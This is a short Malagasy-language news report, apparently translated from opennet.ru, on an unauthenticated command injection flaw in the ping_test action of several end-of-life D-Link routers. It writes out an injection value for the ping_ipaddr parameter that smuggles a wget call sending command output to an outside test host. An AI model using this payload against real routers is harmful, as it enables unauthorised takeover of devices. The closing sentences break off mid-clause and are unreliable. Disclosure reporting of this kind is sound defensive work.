Ao amin'ny router Wireless D-Link
Mahaliana fa araka ny filazan'ny mpamorona firmware, ny antso "ping_test" dia tokony hotanterahina aorian'ny fanamarinana, fa raha ny tena izy dia antsoina na inona na inona izany, na inona na inona miditra ao amin'ny interface interface. Indrindra indrindra, rehefa miditra amin'ny script apply_sec.cgi ary mandalo ny mari-pamantarana "action=ping_test", ny script dia mitodika any amin'ny pejy fanamarinana, fa miaraka amin'izay koa dia manao ny hetsika mifandraika amin'ny ping_test. Mba hanatanterahana ilay kaody dia nisy vulnerability iray hafa nampiasaina tao amin'ny ping_test mihitsy, izay miantso ny ping utility nefa tsy manamarina tsara ny fahamarinan'ny adiresy IP nalefa ho an'ny fitiliana. Ohatra, raha hiantso ny wget utility ary hamindra ny valin'ny baiko "echo 1234" amin'ny mpampiantrano ivelany, dia mariho fotsiny ny parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Ny fisian'ny vulnerability dia voamarina amin'ny fomba ofisialy amin'ireto modely manaraka ireto:
- DIR-655 miaraka amin'ny firmware 3.02b05 na mihoatra;
- DIR-866L miaraka amin'ny firmware 1.03b04 na mihoatra;
- DIR-1565 miaraka amin'ny firmware 1.01 na mihoatra;
- DIR-652 (tsy misy fampahalalana momba ny dikan-teny firmware misy olana)
Efa tapitra ny fe-potoana fanohanana ireo modely ireo, noho izany dia ny D-Link
Taty aoriana dia fantatra fa ny vulnerability ihany koa
Source: opennet.ru